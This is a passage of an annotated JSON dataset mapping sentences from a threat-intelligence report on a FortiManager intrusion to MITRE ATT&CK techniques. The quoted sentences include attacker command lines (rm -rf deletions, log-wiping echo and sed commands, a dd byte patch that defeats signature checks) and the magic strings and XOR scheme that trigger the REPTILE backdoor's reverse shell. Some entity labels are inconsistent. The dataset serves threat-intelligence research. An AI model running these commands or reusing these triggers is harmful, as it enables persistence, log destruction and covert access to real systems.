CASTLETAP.", "sentence_text": "The threat actor then deployed the following three (3) malicious files, seen in Table 5, to the FortiManager upon successful reconnection.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "Deployed three malicious files to the FortiManager", "entities": [ { "text": "FortiManager ", "start": 96, "end": 109, "label": "Infrastructure_Indicator" }, { "text": "deployed ", "start": 22, "end": 31, "label": "Action" }, { "text": " threat actor", "start": 3, "end": 16, "label": "ThreatActor" } ] }, { "uid": "mitre-80_mitre_report-p1-s81-6daafb", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 81, "context_before": "The threat actor then deployed the following three (3) malicious files, seen in Table 5, to the FortiManager upon successful reconnection.", "sentence_text": "The file\n/bin/support\n(MD5:\n9ce2459168cf4b5af494776a70e0feda\n) served as a launch script to execute /bin/klogd (REPTILE variant) and /bin/auth (TABLEFLIP).", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.004", "name": "Unix Shell" } ], "procedure": "Used /bin/support as a launch script to execute REPTILE and TABLEFLIP variants", "entities": [ { "text": "/bin/support", "start": 9, "end": 21, "label": "MalwareTool" }, { "text": "/bin/klogd (REPTILE variant) ", "start": 100, "end": 129, "label": "MalwareTool" }, { "text": " /bin/auth (TABLEFLIP)", "start": 132, "end": 154, "label": "MalwareTool" }, { "text": "9ce2459168cf4b5af494776a70e0feda", "start": 28, "end": 60, "label": "Infrastructure_Indicator" }, { "text": "execute ", "start": 92, "end": 100, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s82-717c0f", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 82, "context_before": "The file\n/bin/support\n(MD5:\n9ce2459168cf4b5af494776a70e0feda\n) served as a launch script to execute /bin/klogd (REPTILE variant) and /bin/auth (TABLEFLIP).", "sentence_text": "The attacker modified the startup file /etc/init.d/localnet to execute the line ‘ nohup /bin/support & ’ so the script would run every time the system was rebooted.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543.002", "name": "Systemd Service" } ], "procedure": "Modified startup file to execute /bin/support on system reboot", "entities": [ { "text": "attacker ", "start": 4, "end": 13, "label": "ThreatActor" }, { "text": "/bin/support ", "start": 88, "end": 101, "label": "MalwareTool" }, { "text": " /etc/init.d/localnet", "start": 38, "end": 59, "label": "Infrastructure_Indicator" }, { "text": "modified ", "start": 13, "end": 22, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s83-e7963c", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 83, "context_before": "The attacker modified the startup file /etc/init.d/localnet to execute the line ‘ nohup /bin/support & ’ so the script would run every time the system was rebooted.", "sentence_text": "Since the running FortiOS file system was an ephemeral copy of the archive rootfs.gz , the files would be deleted from the ephemeral copy after being loaded into memory and persist in the rootfs.gz archive, a file not accessible to users without pulling a forensic image.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s84-3e9a74", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 84, "context_before": "Since the running FortiOS file system was an ephemeral copy of the archive rootfs.gz , the files would be deleted from the ephemeral copy after being loaded into memory and persist in the rootfs.gz archive, a file not accessible to users without pulling a forensic image.", "sentence_text": "The contents of /bin/support can be seen in Figure 14.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s85-298662", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 85, "context_before": "The contents of /bin/support can be seen in Figure 14.", "sentence_text": "#!/bin/bash\n#cp /bin/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s86-cbab22", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 86, "context_before": "#!/bin/bash\n#cp /bin/", "sentence_text": "sh /bin/top sleep 30 /bin/klogd /bin/auth rm -rf /bin/klogd", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s87-50849f", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 87, "context_before": "sh /bin/top sleep 30 /bin/klogd /bin/auth rm -rf /bin/klogd", "sentence_text": "rm -rf /nohup.out rm -rf /bin", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1070.004", "name": "File Deletion" }, { "id": "T1485", "name": "Data Destruction" } ], "procedure": "Deleted /nohup.out and /bin directory", "entities": [ { "text": " /nohup.out", "start": 6, "end": 17, "label": "Infrastructure_Indicator" }, { "text": "/bin", "start": 25, "end": 29, "label": "Infrastructure_Indicator" }, { "text": "rm -rf", "start": 0, "end": 6, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s88-8af94b", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 88, "context_before": "rm -rf /nohup.out rm -rf /bin", "sentence_text": "/support TABLEFLIP (Traffic Redirection Utility)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s89-6b6350", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 89, "context_before": "/support TABLEFLIP (Traffic Redirection Utility)", "sentence_text": "To enable continued access directly from the Internet, the threat actor implemented TABLEFLIP (MD5:\nb6e92149efaf78e9ce7552297505b9d5\n), a passive traffic redirection utility that listens on all active interfaces for specialized command packets.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Implemented TABLEFLIP traffic redirection utility to enable Internet access", "entities": [ { "text": " threat actor", "start": 58, "end": 71, "label": "ThreatActor" }, { "text": "TABLEFLIP ", "start": 84, "end": 94, "label": "MalwareTool" }, { "text": "b6e92149efaf78e9ce7552297505b9d5", "start": 100, "end": 132, "label": "Infrastructure_Indicator" }, { "text": "active interfaces", "start": 194, "end": 211, "label": "Infrastructure_Indicator" }, { "text": "specialized command packets", "start": 216, "end": 243, "label": "Infrastructure_Indicator" }, { "text": "implemented ", "start": 72, "end": 84, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s90-6131a8", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 90, "context_before": "To enable continued access directly from the Internet, the threat actor implemented TABLEFLIP (MD5:\nb6e92149efaf78e9ce7552297505b9d5\n), a passive traffic redirection utility that listens on all active interfaces for specialized command packets.", "sentence_text": "If the magic number was found, the malware extracted a XOR key from offset 0xB of the TCP payload.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1140", "name": "Deobfuscate/Decode Files or Information" } ], "procedure": "Extracted XOR key from TCP payload offset 0xB when magic number found", "entities": [ { "text": "malware ", "start": 35, "end": 43, "label": "MalwareTool" }, { "text": "magic number", "start": 7, "end": 19, "label": "Infrastructure_Indicator" }, { "text": " XOR key", "start": 54, "end": 62, "label": "Infrastructure_Indicator" }, { "text": "TCP payload", "start": 86, "end": 97, "label": "Infrastructure_Indicator" }, { "text": "extracted ", "start": 43, "end": 53, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s91-b1a0ba", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 91, "context_before": "If the magic number was found, the malware extracted a XOR key from offset 0xB of the TCP payload.", "sentence_text": "This key was used as a seed for XOR based sequential decryption.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1140", "name": "Deobfuscate/Decode Files or Information" } ], "procedure": "Used XOR key for sequential decryption", "entities": [ { "text": "used ", "start": 13, "end": 18, "label": "Action" }, { "text": "decryption", "start": 53, "end": 63, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s92-3ede52", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 92, "context_before": "This key was used as a seed for XOR based sequential decryption.", "sentence_text": "TCP payload offset 0xC onwards was decrypted using this scheme.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1140", "name": "Deobfuscate/Decode Files or Information" } ], "procedure": "Decrypted TCP payload from offset 0xC using XOR scheme", "entities": [ { "text": "TCP payload offset 0xC ", "start": 0, "end": 23, "label": "Infrastructure_Indicator" }, { "text": "decrypted ", "start": 35, "end": 45, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s93-08ed6b", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 93, "context_before": "TCP payload offset 0xC onwards was decrypted using this scheme.", "sentence_text": "struct _payload\n{\n_DWORD magic_dword1;\n_DWORD magic_dword2;\n_BYTE unused[3];\n_BYTE xor_key;\n_DWORD command;\n_DWORD ip;\n_WORD port;\n};", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s94-86aa7c", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 94, "context_before": "struct _payload\n{\n_DWORD magic_dword1;\n_DWORD magic_dword2;\n_BYTE unused[3];\n_BYTE xor_key;\n_DWORD command;\n_DWORD ip;\n_WORD port;\n};", "sentence_text": "Traffic redirection was accomplished by adding iptables rules on the FortiManager system as seen in Figure 18.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Added iptables rules for traffic redirection on FortiManager", "entities": [ { "text": "FortiManager system ", "start": 69, "end": 89, "label": "Infrastructure_Indicator" }, { "text": " iptables rules", "start": 46, "end": 61, "label": "Infrastructure_Indicator" }, { "text": "Traffic redirection", "start": 0, "end": 19, "label": "Action" }, { "text": "adding ", "start": 40, "end": 47, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s95-921db2", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 95, "context_before": "Traffic redirection was accomplished by adding iptables rules on the FortiManager system as seen in Figure 18.", "sentence_text": "with the source IP and redirection port specified in the command packet.\niptables\nwas executed to check if a PREROUTING rule for that IP and port combination already existed.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" }, { "id": "T1562.004", "name": "Disable or Modify System Firewall" } ], "procedure": "Executed iptables to check for existing PREROUTING rule for IP/port combination", "entities": [ { "text": "source IP", "start": 9, "end": 18, "label": "Infrastructure_Indicator" }, { "text": "redirection port", "start": 23, "end": 39, "label": "Infrastructure_Indicator" }, { "text": "PREROUTING rule ", "start": 109, "end": 125, "label": "Infrastructure_Indicator" }, { "text": "check ", "start": 98, "end": 104, "label": "Action" }, { "text": "executed ", "start": 86, "end": 95, "label": "Action" }, { "text": "iptables", "start": 73, "end": 81, "label": "MalwareTool" } ] }, { "uid": "mitre-80_mitre_report-p1-s96-12fcd8", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 96, "context_before": "with the source IP and redirection port specified in the command packet.\niptables\nwas executed to check if a PREROUTING rule for that IP and port combination already existed.", "sentence_text": "If the combination was not found, a new redirection rule was added in the PREROUTING chain.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" }, { "id": "T1562.004", "name": "Disable or Modify System Firewall" } ], "procedure": "Added a new redirection rule in the PREROUTING chain", "entities": [ { "text": "PREROUTING chain", "start": 74, "end": 90, "label": "Infrastructure_Indicator" }, { "text": "added ", "start": 61, "end": 67, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s97-c42460", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 97, "context_before": "If the combination was not found, a new redirection rule was added in the PREROUTING chain.", "sentence_text": "The rules under the PREROUTING chain were processed immediately once the packet is received on an interface.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1573", "name": "Encrypted Channel" }, { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Processes PREROUTING chain rules upon packet receipt", "entities": [ { "text": "PREROUTING chain", "start": 20, "end": 36, "label": "Infrastructure_Indicator" }, { "text": "processed ", "start": 42, "end": 52, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s98-62ac55", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 98, "context_before": "The rules under the PREROUTING chain were processed immediately once the packet is received on an interface.", "sentence_text": "These id’s were passed back to iptables with xargs to have them removed from the PREROUTING chain, as seen in Figure 19.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" } ], "procedure": "Removed rules from PREROUTING chain using iptables and xargs", "entities": [ { "text": "PREROUTING chain", "start": 81, "end": 97, "label": "Infrastructure_Indicator" }, { "text": "removed ", "start": 64, "end": 72, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s99-d956bb", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 99, "context_before": "These id’s were passed back to iptables with xargs to have them removed from the PREROUTING chain, as seen in Figure 19.", "sentence_text": "iptables -t nat -S PREROUTING | tail", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s100-55f83c", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 100, "context_before": "iptables -t nat -S PREROUTING | tail", "sentence_text": "-n +2 | grep -n -E '.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s101-18ae8a", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 101, "context_before": "-n +2 | grep -n -E '.", "sentence_text": "To achieve persistent access on the FortiManager device, the threat actor deployed a backdoor with the filename /bin/klogd (MD5:\n53a69adac914808eced2bf8155a7512d\n) that Mandiant refers to as REPTILE, a variant of a publicly available Linux kernel module (LKM) rootkit.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1542", "name": "Pre-OS Boot" } ], "procedure": "Deployed REPTILE backdoor for persistent access on FortiManager", "entities": [ { "text": "REPTILE", "start": 191, "end": 198, "label": "MalwareTool" }, { "text": "Linux kernel module (LKM) rootkit", "start": 234, "end": 267, "label": "MalwareTool" }, { "text": "deployed ", "start": 74, "end": 83, "label": "Action" }, { "text": "/bin/klogd", "start": 112, "end": 122, "label": "Infrastructure_Indicator" }, { "text": "53a69adac914808eced2bf8155a7512d", "start": 129, "end": 161, "label": "Infrastructure_Indicator" }, { "text": "FortiManager device", "start": 36, "end": 55, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-80_mitre_report-p1-s102-0b8c15", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 102, "context_before": "To achieve persistent access on the FortiManager device, the threat actor deployed a backdoor with the filename /bin/klogd (MD5:\n53a69adac914808eced2bf8155a7512d\n) that Mandiant refers to as REPTILE, a variant of a publicly available Linux kernel module (LKM) rootkit.", "sentence_text": "With the assistance of TABLEFLIP, the threat actor was able to successfully forward traffic and access the REPTILE backdoor using iptables traffic redirection rules.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "Used TABLEFLIP to forward traffic and access REPTILE backdoor via iptables rules", "entities": [ { "text": "TABLEFLIP", "start": 23, "end": 32, "label": "MalwareTool" }, { "text": "REPTILE ", "start": 107, "end": 115, "label": "MalwareTool" }, { "text": " iptables traffic redirection rules", "start": 129, "end": 164, "label": "Infrastructure_Indicator" }, { "text": "access ", "start": 96, "end": 103, "label": "Action" }, { "text": "forward traffic ", "start": 76, "end": 92, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s103-0fd23f", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 103, "context_before": "With the assistance of TABLEFLIP, the threat actor was able to successfully forward traffic and access the REPTILE backdoor using iptables traffic redirection rules.", "sentence_text": "Once executed, REPTILE created a packet socket to receive OSI layer 2 packets.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1095", "name": "Non-Application Layer Protocol" } ], "procedure": "Created packet socket to receive OSI layer 2 packets", "entities": [ { "text": "REPTILE ", "start": 15, "end": 23, "label": "MalwareTool" }, { "text": "OSI layer 2 packets", "start": 58, "end": 77, "label": "Infrastructure_Indicator" }, { "text": "packet socket", "start": 33, "end": 46, "label": "Infrastructure_Indicator" }, { "text": "created ", "start": 23, "end": 31, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s104-6f38b4", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 104, "context_before": "Once executed, REPTILE created a packet socket to receive OSI layer 2 packets.", "sentence_text": "When a packet was received, the backdoor would perform the check seen in the pseudocode in Figure 20 to determine if a magic string was present.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1571", "name": "Non-Standard Port" } ], "procedure": "Performed check for magic string in received packets", "entities": [ { "text": "backdoor ", "start": 32, "end": 41, "label": "MalwareTool" }, { "text": "perform the check", "start": 47, "end": 64, "label": "Infrastructure_Indicator" }, { "text": "determine ", "start": 104, "end": 114, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-80_mitre_report-p1-s105-7c0b87", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 105, "context_before": "When a packet was received, the backdoor would perform the check seen in the pseudocode in Figure 20 to determine if a magic string was present.", "sentence_text": "single_byte_xor_key = (month * year)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s106-253b09", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 106, "context_before": "single_byte_xor_key = (month * year)", "sentence_text": "decoded_data[i] = data_to_decode_ptr[i++]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s107-844659", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 107, "context_before": "decoded_data[i] = data_to_decode_ptr[i++]", "sentence_text": "Similar to the method used by CASTLETAP to decode the C2 information, REPTILE derived a single-byte XOR key from the Epoch date stamp to decrypt payload data, which caused the encryption key to change daily.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1140", "name": "Deobfuscate/Decode Files or Information" } ], "procedure": "Derived XOR key from Epoch date to decrypt payload data with daily key rotation", "entities": [ { "text": "CASTLETAP ", "start": 30, "end": 40, "label": "ThreatActor" }, { "text": "REPTILE ", "start": 70, "end": 78, "label": "ThreatActor" }, { "text": "C2 information", "start": 54, "end": 68, "label": "Infrastructure_Indicator" }, { "text": "Epoch date stamp", "start": 117, "end": 133, "label": "Infrastructure_Indicator" }, { "text": "payload data", "start": 145, "end": 157, "label": "Infrastructure_Indicator" }, { "text": "decrypt ", "start": 137, "end": 145, "label": "Action" }, { "text": "decode ", "start": 43, "end": 50, "label": "Action" }, { "text": "derived ", "start": 78, "end": 86, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s108-aaa923", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 108, "context_before": "Similar to the method used by CASTLETAP to decode the C2 information, REPTILE derived a single-byte XOR key from the Epoch date stamp to decrypt payload data, which caused the encryption key to change daily.", "sentence_text": "(month * (year + 1900))", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s109-ff598d", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 109, "context_before": "(month * (year + 1900))", "sentence_text": "* day % 255 year: index starting from 1900 i.e. current_year-1900 month: index starting from 0 date: index starting from 1 If the magic string “ mznCvqSBo ” was found, a reverse shell was created with the C2 IP address and destination port extracted from the rest of the activation packet payload.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1095", "name": "Non-Application Layer Protocol" } ], "procedure": "Created reverse shell to C2 using IP and port from activation packet", "entities": [ { "text": " C2 IP address", "start": 204, "end": 218, "label": "Infrastructure_Indicator" }, { "text": "destination port ", "start": 223, "end": 240, "label": "Infrastructure_Indicator" }, { "text": "activation packet payload", "start": 271, "end": 296, "label": "Infrastructure_Indicator" }, { "text": "reverse shell was created", "start": 170, "end": 195, "label": "Action" }, { "text": "extracted ", "start": 240, "end": 250, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s110-d5d369", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 110, "context_before": "* day % 255 year: index starting from 1900 i.e. current_year-1900 month: index starting from 0 date: index starting from 1 If the magic string “ mznCvqSBo ” was found, a reverse shell was created with the C2 IP address and destination port extracted from the rest of the activation packet payload.", "sentence_text": "When the first magic string was not present, the binary searched for the second magic string “ hpaVAj2FJ ”.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1140", "name": "Deobfuscate/Decode Files or Information" } ], "procedure": "Searched for second magic string in payload", "entities": [ { "text": "hpaVAj2FJ ", "start": 95, "end": 105, "label": "Infrastructure_Indicator" }, { "text": "magic string", "start": 80, "end": 92, "label": "Infrastructure_Indicator" }, { "text": "searched ", "start": 56, "end": 65, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s111-e6ab20", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 111, "context_before": "When the first magic string was not present, the binary searched for the second magic string “ hpaVAj2FJ ”.", "sentence_text": "If this second magic string was found, the REPTILE process will end.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1140", "name": "Deobfuscate/Decode Files or Information" } ], "procedure": "Ends process if second magic string is found", "entities": [ { "text": "REPTILE ", "start": 43, "end": 51, "label": "ThreatActor" }, { "text": "end", "start": 64, "end": 67, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s112-198cbd", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 112, "context_before": "If this second magic string was found, the REPTILE process will end.", "sentence_text": "If no magic strings were found, the backdoor continued to listen for other connections.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1095", "name": "Non-Application Layer Protocol" } ], "procedure": "Listens for other connections if no magic strings found", "entities": [ { "text": "backdoor ", "start": 36, "end": 45, "label": "MalwareTool" }, { "text": "listen ", "start": 58, "end": 65, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s113-5fcc67", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 113, "context_before": "If no magic strings were found, the backdoor continued to listen for other connections.", "sentence_text": "Threat Actor Anti-Forensics Clearing and Modifying Logs echo > /var/log/django.log; \\ echo > /var/log/apache2/error_log; \\ sed -i ‘//d’ /var/log/apache2/*log; \\ ls -alt /var/log/ /var/log/apache2/ Disabling File System Verification on Startup In an attempt to skip digital signature verification checks made to the file system on boot, the threat actor added the command seen in Figure 23 to the startup config /etc/init.d/localnet within the rootfs.gz archive of both FortiManager and FortiAnalyzer devices.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal" }, { "id": "T1562", "name": "Impair Defenses" } ], "procedure": "Cleared and modified logs, disabled file system verification on startup", "entities": [ { "text": "/var/log/django.log", "start": 63, "end": 82, "label": "Infrastructure_Indicator" }, { "text": " /var/log/apache2/error_log", "start": 92, "end": 119, "label": "Infrastructure_Indicator" }, { "text": "/var/log/apache2/*log", "start": 147, "end": 168, "label": "Infrastructure_Indicator" }, { "text": "FortiManager ", "start": 480, "end": 493, "label": "Infrastructure_Indicator" }, { "text": "FortiAnalyzer ", "start": 497, "end": 511, "label": "Infrastructure_Indicator" }, { "text": " rootfs.gz archive", "start": 453, "end": 471, "label": "Infrastructure_Indicator" }, { "text": "/etc/init.d/localnet ", "start": 422, "end": 443, "label": "Infrastructure_Indicator" }, { "text": "Disabling ", "start": 208, "end": 218, "label": "Action" }, { "text": "added ", "start": 364, "end": 370, "label": "Action" }, { "text": "Clearing ", "start": 28, "end": 37, "label": "Action" }, { "text": "Modifying ", "start": 41, "end": 51, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s114-056a10", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 114, "context_before": "Threat Actor Anti-Forensics Clearing and Modifying Logs echo > /var/log/django.log; \\ echo > /var/log/apache2/error_log; \\ sed -i ‘//d’ /var/log/apache2/*log; \\ ls -alt /var/log/ /var/log/apache2/ Disabling File System Verification on Startup In an attempt to skip digital signature verification checks made to the file system on boot, the threat actor added the command seen in Figure 23 to the startup config /etc/init.d/localnet within the rootfs.gz archive of both FortiManager and FortiAnalyzer devices.", "sentence_text": "printf \"t\" | dd of=/bin/smit bs=1", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-80_mitre_report-p1-s115-d7ff5c", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 115, "context_before": "printf \"t\" | dd of=/bin/smit bs=1", "sentence_text": "Comparing the compromised /bin/smit ( a388ebaef45add5da503e4bf2b9da546 ) with a clean version from both FortiManager and FortiAnalyzer, the modified binary contained a single byte difference.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1553.003", "name": "SIP and Trust Provider Hijacking" } ], "procedure": "Modified /bin/smit binary with single byte difference", "entities": [ { "text": "/bin/smit", "start": 26, "end": 35, "label": "Infrastructure_Indicator" }, { "text": "a388ebaef45add5da503e4bf2b9da546", "start": 38, "end": 70, "label": "Infrastructure_Indicator" }, { "text": "FortiManager ", "start": 104, "end": 117, "label": "Infrastructure_Indicator" }, { "text": "FortiAnalyzer", "start": 121, "end": 134, "label": "Infrastructure_Indicator" }, { "text": "modified ", "start": 140, "end": 149, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s116-ea8a4e", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 116, "context_before": "Comparing the compromised /bin/smit ( a388ebaef45add5da503e4bf2b9da546 ) with a clean version from both FortiManager and FortiAnalyzer, the modified binary contained a single byte difference.", "sentence_text": "The modified location within /bin/smit is executed when the mount command line argument is given on system startup.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1543", "name": "Create or Modify System Process" } ], "procedure": "Executes modified code in /bin/smit during system startup", "entities": [ { "text": "/bin/smit", "start": 29, "end": 38, "label": "Infrastructure_Indicator" }, { "text": "executed ", "start": 42, "end": 51, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s117-f2da96", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 117, "context_before": "The modified location within /bin/smit is executed when the mount command line argument is given on system startup.", "sentence_text": "Normally, the mount function would perform OpenSSL 1.1.0 digital signature verification checks on the files in Figure 24 against /data/.fmg_sign , but this modification changed a conditional jump instruction to an unconditional jump instruction which always skipped digital signature verification checks normally made on the system files.\n/data/extlinux.sys\n/data/extlinux.conf\n/data/boot.msg\n/data/vmlinuz\n/data/rootfse-fe\nSince the\nmount\ncommand executes prior to /etc/init.d/localnet on system startup, the dd command will overwrite the 22,866 th byte of /bin/smit with the character “ ”, reverting the binary to a state that appears as if it was never tampered with, even if the file was hashed.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1553.003", "name": "SIP and Trust Provider Hijacking" }, { "id": "T1070.004", "name": "File Deletion" } ], "procedure": "Modified mount function to skip digital signature verification and overwrite system file to hide tampering", "entities": [ { "text": "/data/extlinux.sys", "start": 339, "end": 357, "label": "Infrastructure_Indicator" }, { "text": "/data/extlinux.conf", "start": 358, "end": 377, "label": "Infrastructure_Indicator" }, { "text": "/data/boot.msg", "start": 378, "end": 392, "label": "Infrastructure_Indicator" }, { "text": "/data/vmlinuz", "start": 393, "end": 406, "label": "Infrastructure_Indicator" }, { "text": "/data/rootfse-fe", "start": 407, "end": 423, "label": "Infrastructure_Indicator" }, { "text": "/bin/smit ", "start": 558, "end": 568, "label": "Infrastructure_Indicator" }, { "text": "/data/.fmg_sign", "start": 129, "end": 144, "label": "Infrastructure_Indicator" }, { "text": "skipped ", "start": 258, "end": 266, "label": "Action" }, { "text": "overwrite ", "start": 526, "end": 536, "label": "Action" }, { "text": "reverting ", "start": 592, "end": 602, "label": "Action" } ] }, { "uid": "mitre-80_mitre_report-p1-s118-5f4f98", "source": "mitre", "doc_id": "80_mitre_report", "page_number": 1, "sentence_id": 118, "context_before": "Normally, the mount function would perform OpenSSL 1.1.0 digital signature verification checks on the files in Figure 24 against /data/.fmg_sign , but this modification changed a conditional jump instruction to an unconditional jump instruction which 